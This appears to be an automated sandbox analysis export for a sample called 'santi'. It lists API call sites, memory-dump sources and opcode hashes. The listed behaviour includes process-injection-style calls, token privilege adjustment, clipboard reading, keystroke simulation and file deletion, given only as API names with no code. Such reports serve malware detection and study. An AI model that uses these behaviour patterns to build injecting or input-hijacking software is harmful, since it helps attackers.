                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                • String ID:
                                                                • API String ID: 2800547568-0
                                                                • Opcode ID: 20310ba69a5380a7593964530f71ba5826e07c192876141cb9637a70b905b5fb
                                                                • Instruction ID: 50c5d6ce8e84af72c20518f715d454873b5753f75cff03971967ff498c569d1d
                                                                • Opcode Fuzzy Hash: 20310ba69a5380a7593964530f71ba5826e07c192876141cb9637a70b905b5fb
                                                                • Instruction Fuzzy Hash: 9AF0BB71943708AAD7137B69C86775EB6A85F41330F258108E450AF2D1CB7C8701DF55
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00E169CB
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E16A61
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E16A83
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                • Instruction ID: e598e7deb5e0f2bfe42dc5ee945e193ddaaa5d9a2f4a53b4e007db11da84a931
                                                                • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                • Instruction Fuzzy Hash: 9512DE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                                APIs
                                                                • __flush.LIBCMT ref: 00302A0B
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __flush__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 4101623367-0
                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                • Instruction ID: 445557ce4be67eb92da991844261c75e55383a1679f1f4de7b0396beb5b4cc4b
                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                • Instruction Fuzzy Hash: 5941A4317027069FDF2A8E69C8A95AF77BAAF44360B25853DE855CB2C0EF70DD518B40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction ID: 539fdfdb5aeeec344412e415a0815360c22beede91ebf62e2501bbacae24450f
                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction Fuzzy Hash: 6D31EA70A1010ADBCB1ADF18C480979F7A9FF49380B6586B5E509CBB65DB31EDD1CB80
                                                                APIs
                                                                  • Part of subcall function 002E4214: FreeLibrary.KERNEL32(00000000,?), ref: 002E4247
                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002E39FE,?,00000001), ref: 002E41DB
                                                                  • Part of subcall function 002E4291: FreeLibrary.KERNEL32(00000000), ref: 002E42C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Library$Free$Load
                                                                • String ID:
                                                                • API String ID: 2391024519-0
                                                                • Opcode ID: 64646fe4f56041e312bcbe340b1e06ff809c1fe2030bb233f72d76903b4256b0
                                                                • Instruction ID: 37b735857ab1917e0ab4ae0b41bfd96029ba76e057a5d6b0468a9ece6e2fb2f6
                                                                • Opcode Fuzzy Hash: 64646fe4f56041e312bcbe340b1e06ff809c1fe2030bb233f72d76903b4256b0
                                                                • Instruction Fuzzy Hash: 14113A31760305BBCB11BB76DC12F9E77A89F40700F508429FA92AA0C1DF74EA249F60
                                                                APIs
                                                                • ___lock_fhandle.LIBCMT ref: 0030AFC0
                                                                  • Part of subcall function 00307BDA: __getptd_noexit.LIBCMT ref: 00307BDA
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                • String ID:
                                                                • API String ID: 1144279405-0
                                                                • Opcode ID: 5cbf4d3fd4589a970f72ce187346cedf1dc15983d110d1f30cc088e26a45ee2a
                                                                • Instruction ID: 25764459c417fb8d7afe045d397f8f754655f3b0da0050782498728d098cb146
                                                                • Opcode Fuzzy Hash: 5cbf4d3fd4589a970f72ce187346cedf1dc15983d110d1f30cc088e26a45ee2a
                                                                • Instruction Fuzzy Hash: DE1191729076009FE713BFA8D86275ABB64AF42331F164640E4741F1E2D7B59D109BA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                • Instruction ID: 5174b8198589201dccd3466a9634365dc8f85b00477ff15edefb56178bac9cfe
                                                                • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                • Instruction Fuzzy Hash: 0101A43145014DAFCF05EFA5C892CFFBB74EF21304F40802AB926971A5EA309A99DF60
                                                                APIs
                                                                • __lock_file.LIBCMT ref: 00302AED
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit__lock_file
                                                                • String ID:
                                                                • API String ID: 2597487223-0
                                                                • Opcode ID: b8892e5d593a109b7efba3f8007460f3bb74599eea11059cfecd7a08175c8786
                                                                • Instruction ID: e15e44b82064bce0a5082668f1cff303a8e47872a451c8c2f6042cea8b85bbeb
                                                                • Opcode Fuzzy Hash: b8892e5d593a109b7efba3f8007460f3bb74599eea11059cfecd7a08175c8786
                                                                • Instruction Fuzzy Hash: 84F06D31A02205AADF23AFA9CC1A79F7AA5BF00320F158415F4149E1E1DF788A62DB91
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,002E39FE,?,00000001), ref: 002E4286
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 9c3c90c628061e3fb37ef529d9666c04ebaa10b05d4adc65da4686a41c971804
                                                                • Instruction ID: 2137d7402f65a7549206cb38a82f22c69e3c7dcd32ce88ee16565418e9e2a82a
                                                                • Opcode Fuzzy Hash: 9c3c90c628061e3fb37ef529d9666c04ebaa10b05d4adc65da4686a41c971804
                                                                • Instruction Fuzzy Hash: 0CF0A070565342CFCB34AF62D894812B7E4BF043153208A7EF6C682510C3B19850CF40
                                                                APIs
                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002E40C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID:
                                                                • API String ID: 82841172-0
                                                                • Opcode ID: 9815b1245579cc68e230900e4da3ec9f2807685c9d50415f90f8447403d6385c
                                                                • Instruction ID: fa303f96235db06294bb8c326411e4be483655494fdc36e40ec3dda66bcfdc39
                                                                • Opcode Fuzzy Hash: 9815b1245579cc68e230900e4da3ec9f2807685c9d50415f90f8447403d6385c
                                                                • Instruction Fuzzy Hash: 54E0CD36A001245BC7129755CC46FEE779DDF88790F054175F905D7344D9A499818690
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 00E17221
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction ID: 0c968689108ad33790e85ca69d18611254f676d9488cd53f825db6de0419b668
                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction Fuzzy Hash: 42E0BF7494410DEFDB00EFA4D9496DE7BB4EF04701F1005A1FD05E7691DB309E54CA62
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 00E17221
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction ID: d54b5cc57b3caf505e1b95ae56c1ee42d9882f0334fdddfffa797d2e6cb28765
                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction Fuzzy Hash: 3AE0E67494410DDFDB00EFB4D9496DE7FB4EF04701F100161FD01E2281D6309D50CA62
                                                                APIs
                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0034B1CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: %d/%02d/%02d
                                                                • API String ID: 3850602802-328681919
                                                                • Opcode ID: 38a04fec3fba7e7ccab9f1047492ce39d67c52493417a00358514e1f74bf00c9
                                                                • Instruction ID: ad38b242f547e9f013581050a51a246180fc78d3d17551135f767b8de17a05b8
                                                                • Opcode Fuzzy Hash: 38a04fec3fba7e7ccab9f1047492ce39d67c52493417a00358514e1f74bf00c9
                                                                • Instruction Fuzzy Hash: 4C12B071640608ABEB268F65CC49FAABBF8FF45750F108119F916DF2D1DBB0A941CB21
                                                                APIs
                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 002FEB4A
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00353AEA
                                                                • IsIconic.USER32(000000FF), ref: 00353AF3
                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00353B00
                                                                • SetForegroundWindow.USER32(000000FF), ref: 00353B0A
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00353B20
                                                                • GetCurrentThreadId.KERNEL32 ref: 00353B27
                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00353B33
                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00353B44
                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00353B4C
                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00353B54
                                                                • SetForegroundWindow.USER32(000000FF), ref: 00353B57
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B6C
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353B77
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B81
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353B86
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B8F
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353B94
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00353B9E
                                                                • keybd_event.USER32(00000012,00000000), ref: 00353BA3
                                                                • SetForegroundWindow.USER32(000000FF), ref: 00353BA6
                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00353BCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 4125248594-2988720461
                                                                • Opcode ID: 30fdb5774a9e38c9de77bc8934d7884d6569bd4bf8bb8385f815d1f279474c47
                                                                • Instruction ID: be3a1474df97ef71d4f714c1b52dc8fca9698082aa6976706622bff3326ad3aa
                                                                • Opcode Fuzzy Hash: 30fdb5774a9e38c9de77bc8934d7884d6569bd4bf8bb8385f815d1f279474c47
                                                                • Instruction Fuzzy Hash: 9C31A6B1F403187BEB225B658C49F7F7E6CEB45B90F118015FE05EA1E0D6F05D00AAA0
                                                                APIs
                                                                  • Part of subcall function 0031B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0031B180
                                                                  • Part of subcall function 0031B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0031B1AD
                                                                  • Part of subcall function 0031B134: GetLastError.KERNEL32 ref: 0031B1BA
                                                                • _memset.LIBCMT ref: 0031AD08
                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0031AD5A
                                                                • CloseHandle.KERNEL32(?), ref: 0031AD6B
                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0031AD82
                                                                • GetProcessWindowStation.USER32 ref: 0031AD9B
                                                                • SetProcessWindowStation.USER32(00000000), ref: 0031ADA5
                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0031ADBF
                                                                  • Part of subcall function 0031AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0031ACC0), ref: 0031AB99
                                                                  • Part of subcall function 0031AB84: CloseHandle.KERNEL32(?,?,0031ACC0), ref: 0031ABAB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                • String ID: $H*9$default$winsta0
                                                                • API String ID: 2063423040-193336070
                                                                • Opcode ID: d1d5f561fc3f496a7da9c7beac1babe68b3e5bb0c47ee0e495ed99e1c2f78de2
                                                                • Instruction ID: 9b262a6b52552cec0d7d9b09d58df5f4252ce676475a7f9cd4da0b44d48f9d86
                                                                • Opcode Fuzzy Hash: d1d5f561fc3f496a7da9c7beac1babe68b3e5bb0c47ee0e495ed99e1c2f78de2
                                                                • Instruction Fuzzy Hash: B381CC71902209AFDF16DFA4CC48AEEBBBCEF08345F058129F814A6161D7718E95DB72
                                                                APIs
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00325FA6,?), ref: 00326ED8
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00325FA6,?), ref: 00326EF1
                                                                  • Part of subcall function 0032725E: __wsplitpath.LIBCMT ref: 0032727B
                                                                  • Part of subcall function 0032725E: __wsplitpath.LIBCMT ref: 0032728E
                                                                  • Part of subcall function 003272CB: GetFileAttributesW.KERNEL32(?,00326019), ref: 003272CC
                                                                • _wcscat.LIBCMT ref: 00326149
                                                                • _wcscat.LIBCMT ref: 00326167
                                                                • __wsplitpath.LIBCMT ref: 0032618E
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003261A4
                                                                • _wcscpy.LIBCMT ref: 00326209
                                                                • _wcscat.LIBCMT ref: 0032621C
                                                                • _wcscat.LIBCMT ref: 0032622F
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0032625D
                                                                • DeleteFileW.KERNEL32(?), ref: 0032626E
                                                                • MoveFileW.KERNEL32(?,?), ref: 00326289
                                                                • MoveFileW.KERNEL32(?,?), ref: 00326298
                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 003262AD
                                                                • DeleteFileW.KERNEL32(?), ref: 003262BE
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003262E1
                                                                • FindClose.KERNEL32(00000000), ref: 003262FD
                                                                • FindClose.KERNEL32(00000000), ref: 0032630B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                • String ID: \*.*
                                                                • API String ID: 1917200108-1173974218
                                                                • Opcode ID: 33c5d3979400d070ab4e3ff9499cac64c9f2a870601eb3635b76c86895e550ea
                                                                • Instruction ID: f03ff83258aa92f9e3ea418c2ac781a8dcf7b2c8cc06ba2fbc3ce9df8e1af6ae
                                                                • Opcode Fuzzy Hash: 33c5d3979400d070ab4e3ff9499cac64c9f2a870601eb3635b76c86895e550ea
                                                                • Instruction Fuzzy Hash: A3517372D0822CAACB22EB91DC45DEF77BCAF05300F0544EAE585E7141DE72A7498FA4
                                                                APIs
                                                                • OpenClipboard.USER32(0037DC00), ref: 00336B36
                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00336B44
                                                                • GetClipboardData.USER32(0000000D), ref: 00336B4C
                                                                • CloseClipboard.USER32 ref: 00336B58
                                                                • GlobalLock.KERNEL32(00000000), ref: 00336B74
                                                                • CloseClipboard.USER32 ref: 00336B7E
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00336B93
                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00336BA0
                                                                • GetClipboardData.USER32(00000001), ref: 00336BA8
                                                                • GlobalLock.KERNEL32(00000000), ref: 00336BB5
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00336BE9
                                                                • CloseClipboard.USER32 ref: 00336CF6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                • String ID:
                                                                • API String ID: 3222323430-0
                                                                • Opcode ID: b456be51ca68cdaffcee44adcd677f11fb7cd0d9144e0fcc8abe98b638c32468
                                                                • Instruction ID: a104fb59f6998e945f7fa4308c30200424cae82005a9c8262bdcd3aa3e8dca67
                                                                • Opcode Fuzzy Hash: b456be51ca68cdaffcee44adcd677f11fb7cd0d9144e0fcc8abe98b638c32468
                                                                • Instruction Fuzzy Hash: CE519071240201AFD312AF66DD9AF6E77BCAF48B01F418529F646D61E1DFB0D8058B62
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0032F62B
                                                                • FindClose.KERNEL32(00000000), ref: 0032F67F
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032F6A4
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032F6BB
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032F6E2
                                                                • __swprintf.LIBCMT ref: 0032F72E
                                                                • __swprintf.LIBCMT ref: 0032F767
                                                                • __swprintf.LIBCMT ref: 0032F7BB
                                                                  • Part of subcall function 0030172B: __woutput_l.LIBCMT ref: 00301784
                                                                • __swprintf.LIBCMT ref: 0032F809
                                                                • __swprintf.LIBCMT ref: 0032F858
                                                                • __swprintf.LIBCMT ref: 0032F8A7
                                                                • __swprintf.LIBCMT ref: 0032F8F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
